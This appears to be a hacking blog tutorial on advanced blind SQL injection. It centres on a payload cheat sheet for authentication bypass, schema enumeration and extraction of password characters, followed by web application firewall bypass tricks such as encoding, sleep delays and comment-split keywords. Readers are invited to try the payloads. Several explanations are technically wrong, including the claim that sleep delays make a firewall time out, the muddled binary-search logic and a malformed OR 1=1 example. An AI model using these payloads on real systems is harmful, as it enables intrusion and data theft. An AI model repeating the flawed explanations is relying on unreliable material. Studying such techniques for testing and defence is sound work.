Hello Hackers!

In the world of cyber security, SQL injection attacks remain one of the most common and devastating methods used by hackers to compromise web applications and gain access to sensitive information. While basic SQL injection attacks are well-known and relatively easy to defend against, advanced SQL injection techniques can be much more difficult to detect and prevent.

In this blog post, we’ll dive into the world of advanced SQL injection attacks, exploring the techniques and strategies that hackers use to exploit vulnerabilities in web applications and compromise your data. We’ll also discuss best practices for defending against these attacks and keeping your applications secure.

What is SQL Injection?

Imagine you are building a fortress to keep your valuable treasures safe. You add layers of security measures like walls, gates, and guards to ensure that only authorized people can enter and access your treasure. But what if someone found a secret passage that bypasses all the security measures and grants them access to your treasure room? That’s exactly what SQL injection is like for a web application.

SQL injection is a sneaky technique that attackers use to exploit vulnerabilities in a web application’s code, bypass security measures, and gain access to sensitive data. It’s like a secret passage that attackers find in the code of the application, which allows them to inject malicious code into the database without being detected.

In simple terms, SQL injection is like a thief breaking into your house through an unlocked window, stealing your most valuable possessions, and leaving without a trace. And just like how you would secure your house by locking all the windows and doors, you need to secure your web application by implementing proper measures to prevent SQL injection attacks.

SQL

There are several types of SQL injection attacks, including basic SQL injection, blind SQL injection, and out-of-band SQL injection.In this blog, we’ll discuss advanced SQL injection techniques that utilize blind methods.

What is Blind SQL Injection?

Imagine you are a detective trying to solve a mystery. You have a clue that the culprit’s name starts with the letter ‘S’. But you don’t know the full name or any other details about them. You have to gather more information to solve the case. Blind SQL injection is similar to this mystery, where an attacker injects malicious code into a web application to gather sensitive information without actually seeing the results.

Blind SQL injection is a type of SQL injection attack where the attacker is unable to directly see the results of their injection. This is because the web application is not configured to display the results of the SQL query that the attacker is injecting. Instead, the attacker has to carefully craft SQL queries and analyze the application’s response to determine information about the database schema and data.

To continue with our detective analogy, blind SQL injection is like trying to solve a case with limited clues. You have to use your detective skills to carefully analyze the evidence you have and gather more information to solve the case. Similarly, an attacker has to use their knowledge of SQL and the application’s behavior to craft the right queries and analyze the response to gather sensitive information.

Types of Blind SQL Injection Attacks

Blind SQL Injection attacks can be divided into two categories: Time-Based Blind SQL Injection and Boolean-Based Blind SQL Injection.

Blind SQL Injection

Time-Based Blind SQL Injection

One way to execute a blind SQL injection is by using a time-based technique. The attacker can inject a SQL query that contains a delay, such as “WAITFOR DELAY ’00:00:05‘” (which will pause the query execution for 5 seconds). If the application’s response time increases by 5 seconds, the attacker can conclude that their injected query was successful.

Boolean-Based Blind SQL Injection

Another technique is Boolean-based blind SQL injection. The attacker can inject a SQL query that contains a Boolean expression, such as “AND 1=1” or “AND 1=2“. If the application behaves differently (such as returning an error message or displaying different content) based on the result of the Boolean expression, the attacker can infer information about the database.

In short, Time-Based Blind SQL Injection involves injecting SQL code that forces the application to wait for a specific amount of time before responding, while Boolean-Based Blind SQL Injection uses Boolean expressions to check if a certain condition is true or false. Attackers often use such techniques, when they don’t expect the output but only want to analyze the database behaviour.

Why is Blind SQL Injection Dangerous?

Blind SQL injection is like a ninja that sneaks in undetected, takes control of your web application’s database, and steals sensitive information without leaving any trace. It’s a dangerous type of attack because it’s hard to detect and can have severe consequences for the web application and its users.

Blind SQL injection attacks can cause data breaches, where an attacker gains unauthorized access to sensitive information such as usernames, passwords, and credit card numbers. This can result in financial loss, identity theft, and damage to the reputation of the web application and its users.

Furthermore, blind SQL injection attacks can also cause the web application to perform unintended actions such as deleting or modifying data, altering the application’s behavior, or even taking complete control of the server. This can result in downtime, loss of data, and compromise of the entire web application.

The danger of blind SQL injection lies in its ability to bypass traditional security measures such as firewalls and intrusion detection systems. Unlike other attacks that can be detected and prevented with standard security measures, blind SQL injection attacks require a deeper understanding of the web application’s code and behavior. This makes it essential for web developers and security experts to take appropriate measures to prevent blind SQL injection attacks and keep their web applications safe from harm.

SQL injection

Moreover, Blind SQL Injection attacks are often difficult to detect and prevent because they do not provide any visible feedback to the user. This means that an attacker can perform these attacks without raising any suspicion or triggering any security alarms.

How to Find Blind SQL Injection?

Blind SQL Injection attacks rely on a few key principles. First, an attacker needs to find a vulnerability in the application’s input validation process. This can be done by identifying input fields that are vulnerable to SQL Injection attacks, such as login forms or search fields.

How to find SQL injection

Once the attacker identifies a vulnerable input field, they can start injecting malicious SQL code into the input field. The goal of the attacker is to extract sensitive information from the application’s database or perform unauthorized actions.

However, Blind SQL Injection attacks are more difficult to execute than traditional SQL Injection attacks because the application does not provide any visible feedback or errors. Instead, the attacker has to rely on other techniques to determine if their injection was successful.

Blind SQL Injection Cheat Sheet

Now we will see some most important and used SQL queries that are often used by attackers when performing SQL injection attacks on targets.

Boolean-Based Blind SQL Injection Payloads:

Below are a few queries that are coming under Boolean-based blind SQLi. You can try each query to practice and see how it works and what it returns. for example let’s suppose a website has a login page where a user enters their username and password. The SQL query used to authenticate the user might look something like this:

SELECT * FROM users WHERE username = '[username]' AND password = '[password]'

If an attacker injects the payload ‘OR 1=1’ into the password field, the resulting SQL query will look like this:

SELECT * FROM users WHERE username = '[username]' AND password = '' OR 1=1'

This query will return all the rows in the table, effectively bypassing the password check and allowing the attacker to log in as any user in the database, including the administrator.

here you can see some more payloads like that:

    ' or 1=1 --
    ' or 1=0 --
    ' or 'a'='a' --
    ' or 'a'='b' --
    ' or 1=1 and 'a'='a --
    ' or 1=0 and 'a'='b' --
    ' or sleep(5) --
    ' or benchmark(99999999,md5('test')) --

Retrieving Information:

Below queries will help to retrieve information from information schema. for example in ‘ or (select count(*) from [Table name]) = 10 — , the attacker is attempting to modify the WHERE clause of an SQL query to always return a true condition, thereby bypassing any authentication or authorization checks that may be in place.

The payload achieves this by using a subquery to count the number of rows in a specified table and then comparing that count to a predetermined value, in this case, 10. If the count of rows is equal to 10, the payload will return a true condition, allowing the attacker to bypass any security measures.

Here’s an example of how the payload might be used in an SQL injection attack:

Suppose a website has a search feature that allows users to search for products by name. The SQL query used to retrieve the products might look like this:

SELECT * FROM products WHERE name LIKE '%[search term]%'

If an attacker injects the payload ‘OR (SELECT COUNT(*) FROM users) = 10 –‘ into the search term field, the resulting SQL query will look like this:

SELECT * FROM products WHERE name LIKE '%' OR (SELECT COUNT(*) FROM users) = 10 -- %'

The query will return all the products in the table, effectively bypassing the search functionality, because the payload will always evaluate to true regardless of the search term provided.

here you can see some more payloads like that:

    ' or (select count(*) from [Table name]) = 10 --
    ' or (select count(*) from [Table name] where [Column name]='admin' and [Column name]='admin') = 1 --
    ' or (select table_name from information_schema.tables where table_schema=database() limit 0,1)='[Table name]' --
    ' or (select column_name from information_schema.columns where table_name='[Table name]' limit 0,1)='[Column name]' --
    ' or (select group_concat(column_name) from information_schema.columns where table_name='[Table name]') --

Conditional Retrieval:

Below queries will help to retrieve information from database.

For example, suppose we have a web application with a search feature that allows users to search for products in a database. The application uses a SQL query to search for products based on user input.

The SQL query might look something like this:

SELECT * FROM products WHERE name LIKE '%input_query%' 

In this query, the input_query is the user’s search term. However, if the application is vulnerable to SQL injection, an attacker can modify the input_query to inject malicious SQL code into the query.

Now, let’s say the attacker wants to test whether the application is vulnerable to SQL injection. They can use the SQL injection payload you provided, which looks like this:

' or (select case when (1=1) then 'true' else 'false' end) = 'true' --

To use this payload, the attacker would modify the input_query parameter to include the payload. The modified SQL query would look like this:

SELECT * FROM products WHERE name LIKE '%'' or (select case when (1=1) then 'true' else 'false' end) = 'true' --%' 

In this modified query, the input_query is now %'' or (select case when (1=1) then 'true' else 'false' end) = 'true' --%, which includes the injected payload.

here you can see some more payloads like that:

    ' or (select case when (1=1) then 'true' else 'false' end) = 'true' --
    ' or (select case when (1=2) then 'true' else 'false' end) = 'false' --
    ' or (select case when (substring((select [Column name] from [Table name] limit 0,1),1,1)='a') then 'true' else 'false' end) = 'true' --

Enumerating Values:

Below queries will help to retrieve information from…..

for example,

Let’s say we have a web application that allows users to search for products in a database using a search feature. The application uses a SQL query to search for products based on user input.

The SQL query might look something like this:

SELECT * FROM products WHERE name LIKE '%input_query%'

In this query, the input_query is the user’s search term. However, if the application is vulnerable to SQL injection, an attacker can modify the input_query to inject malicious SQL code into the query.

Now, let’s say the attacker wants to test whether the application is vulnerable to SQL injection. They can use the SQL injection payload you provided, which looks like this:

' or (select ascii(substring((select [Column name] from [Table name] limit 0,1),1,1)))=97 --

To use this payload, the attacker would modify the input_query parameter to include the payload. The modified SQL query would look like this:

SELECT * FROM products WHERE name LIKE '%'' or (select ascii(substring((select [Column name] from [Table name] limit 0,1),1,1)))=97 --%' 

In this modified query, the input_query is now %'' or (select ascii(substring((select [Column name] from [Table name] limit 0,1),1,1)))=97 --%, which includes the injected payload.

The purpose of this payload is to test whether the application is vulnerable to SQL injection. The injected code extracts the first character of a specified column in a specified table and checks whether it is equal to ‘a’. If the application returns any results, the attacker knows that the SQL injection was successful.

    ' or (select ascii(substring((select [Column name] from [Table name] limit 0,1),1,1)))=97 --
    ' or (select length([Column name]) from [Table name] limit 0,1)=5 --
    ' or (select substring((select [Column name] from [Table name] limit 0,1),1,1)='a') --

Boolean-Based Advanced Exploitation Techniques (The Binary Search Method)

Now we will see how we can fasten the process of SQL injection with the help of the binary search method.

There are many methods to extract a single character from a specific column within a specified table in a SQL database. one of them is the binary search method.

The Binary Search Method is an advanced Blind SQL Injection exploitation technique that can be used to extract data from a database more quickly. This technique involves guessing the value of a character in a column and then using a binary search to refine the guess until the correct value is found.

Here’s how the Binary Search Method works:

Guess the value of the first character in the column using a payload like this:

' or SUBSTRING((SELECT [column_name] FROM [table_name] LIMIT 1 OFFSET 0), 1, 1) > 'a'--

Let’s say we have a web application that uses a SQL database to store user information. website is protected by firewall, which dosent allow web pages to display any sql output or error. The application has a login form that accepts a username and password, and the server-side code executes a SQL query to validate the user’s credentials.

The SQL query might look something like this:

SELECT * FROM users WHERE username = 'input_username' AND password = 'input_password' 

In this query, the username and password are input values provided by the user through the login form. However, if the application is vulnerable to SQL injection, an attacker can modify the input values to inject malicious SQL code into the query.

Now, let’s say the attacker wants to extract a single character from the “password” column of the “users” table. and website have firewall. so, it will not display any output. They can use the SQL injection payload you provided, which looks like this:

' or SUBSTRING((SELECT [column_name] FROM [table_name] LIMIT 1 OFFSET 0), 1, 1) > 'a'-- 

To use this payload, the attacker would modify the input value for the “username” parameter to include the payload. The modified SQL query would look like this:

SELECT * FROM users WHERE username = '' or SUBSTRING((SELECT [password] FROM [users] LIMIT 1 OFFSET 0), 1, 1) > 'a'--' AND password = 'input_password' 

In this modified query, the username input value is empty (since it’s being overwritten by the injected payload), and the SQL injection payload has been inserted into the query. The payload consists of the following:

  • ' or : This is the beginning of the injected code, which will be executed as part of the SQL query.
  • SUBSTRING((SELECT [password] FROM [users] LIMIT 1 OFFSET 0), 1, 1) : This is a subquery that selects the first character from the “password” column of the “users” table.
  • > 'a'-- : This is a comparison operator that checks whether the first character of the password is greater than the character ‘a’.
  • ' : This is the end of the injected code, which closes the single quote that was opened at the beginning.
  • The -- at the end of the payload is a comment, which tells the database to ignore everything after that point. This is important because it ensures that the rest of the query (which includes the original password input value) doesn’t interfere with the injected code.

When the modified query is executed, the database will try to select the user with an empty username (because of the injected payload) and a password that has a first character greater than ‘a’. If the password meets the condition, the query will return the user’s information, and the attacker will know that the injection was successful. Otherwise, the query will not return any results, indicating that the injection failed.

If the application behaves differently when the guess is correct, then the guessed value is greater than the actual value. If the application behaves the same, then the guessed value is less than or equal to the actual value.

Based on the result of step 1, guess the value of the first character again, but this time using a binary search:

' or SUBSTRING((SELECT [column_name] FROM [table_name] LIMIT 1 OFFSET 0), 1, 1) > 'm'--

Repeat steps 1 and 2 until the correct value is found.

Bypassing WAFs (Web Application Firewalls) during Blind SQL Injection

Web Application Firewalls (WAFs) are security systems designed to protect web applications from attacks like SQL Injection. WAFs analyze incoming traffic to a web application and block any traffic that appears to be malicious. However, WAFs can be bypassed by attackers, especially during Blind SQL Injection attacks. Now, we will discuss how to bypass WAFs during Blind SQL Injection attacks.

Bypassing WAF for SQL Injection

Obfuscation

Obfuscation is a technique that can be used to bypass WAFs by disguising the SQL Injection payload as something else. Obfuscation can be used to avoid detection by WAFs that rely on signatures or regular expressions to detect SQL Injection.

Here are some obfuscation techniques that can be used to bypass WAFs:

  • Hex Encoding: This technique involves encoding the SQL Injection payload in hexadecimal format. This can be used to bypass WAFs that look for specific strings or characters in the payload.
  • Base64 Encoding: This technique involves encoding the SQL Injection payload in Base64 format. This can be used to bypass WAFs that look for specific strings or characters in the payload.
  • Double URL Encoding: This technique involves encoding the SQL Injection payload twice in URL format. This can be used to bypass WAFs that look for specific strings or characters in the payload.

Time-Based Techniques

Time-Based Techniques can be used to bypass WAFs that rely on signatures or regular expressions to detect SQL Injection. These techniques involve introducing time delays in the SQL Injection payload, which can cause the WAF to timeout and allow the payload to pass through.

Here are some Time-Based Techniques that can be used to bypass WAFs:

  • Sleep(): This function can be used to introduce a delay in the query execution. The attacker can use this delay to bypass the WAF.
    For example,SELECT * FROM users WHERE username = 'admin' AND password = 'password' AND 1=IF(SLEEP(10),1,0) In this example, the attacker is attempting to bypass a web application firewall (WAF) by introducing a delay in the query execution. The “Sleep()” function is used to cause the query to pause for 10 seconds before returning a response. The “IF()” function is used to evaluate whether the delay occurred (whether the query took longer than 10 seconds to execute). If the delay did occur, the “IF()” function returns a value of “1”, which allows the query to proceed. If the delay did not occur, the “IF()” function returns a value of “0”, which causes the query to fail.
  • Waitfor Delay: This function can be used to introduce a delay in the query execution. The attacker can use this delay to bypass the WAF.
    For example,SELECT * FROM users WHERE username = 'admin' AND password = 'password' WAITFOR DELAY '0:0:10' In this example, the attacker is again attempting to bypass a web application firewall (WAF) by introducing a delay in the query execution. The “WAITFOR DELAY” function is used to cause the query to pause for 10 seconds before returning a response. The query selects all records from the “users” table where the username is “admin” and the password is “password”.

Fragmentation

Fragmentation is a technique that can be used to bypass WAFs that look for specific strings or characters in the SQL Injection payload. This technique involves splitting the SQL Injection payload into multiple parts and sending them separately to the web application.

Here’s how Fragmentation can be used to bypass WAFs:

  • Split the SQL Injection payload into multiple parts, such as “UNI” and “ON SE” for “UNION SELECT”.
  • Send each part separately to the web application.
  • The WAF will not be able to detect the SQL Injection payload because it is split into multiple parts.
    For example,SELECT * FROM users WHERE username = 'admin' AND password = 'password' UNION SEL/*Payload Split*/ECT column1, column2 FROM users WHERE username = 'admin' AND '1'='1' In this example, the attacker is attempting to inject a UNION SELECT statement into the query by splitting the payload into multiple parts. The “SEL” and “ECT” parts of the payload are separated by a comment, which allows the injection to bypass certain security measures that look for specific strings or patterns in the query.

FAQ

  • Q: What is SQL injection?

SQL injection is a type of web application security vulnerability that allows an attacker to inject malicious code into a web application’s database.

  • Q: What is blind SQL injection?

Blind SQL injection is a type of SQL injection where an attacker can’t see the results of their injection in the web application’s response.

  • Q: Why is blind SQL injection dangerous?

Blind SQL injection is dangerous because it can allow an attacker to steal sensitive information from a web application’s database without being detected.

  • Q: How can I prevent blind SQL injection attacks?

You can prevent blind SQL injection attacks by implementing proper input validation and sanitization, using parameterized queries, and following secure coding practices.

  • Q: How can I identify blind SQL injection vulnerabilities in a web application?

You can use techniques like time-based, boolean-based, error-based, and out-of-band blind SQL injection to identify vulnerabilities in a web application.

Conclusion

In conclusion, advanced blind SQL injection is a serious vulnerability that can have severe consequences for web applications. This blog discussed the different types of blind SQL injection attacks, provided a cheat sheet of payloads, and described advanced techniques to bypass firewalls and other security measures.

Thank you for reading, and we hope this blog provided valuable insights into advanced blind SQL injection techniques.

Shares:

Leave a Reply

Your email address will not be published. Required fields are marked *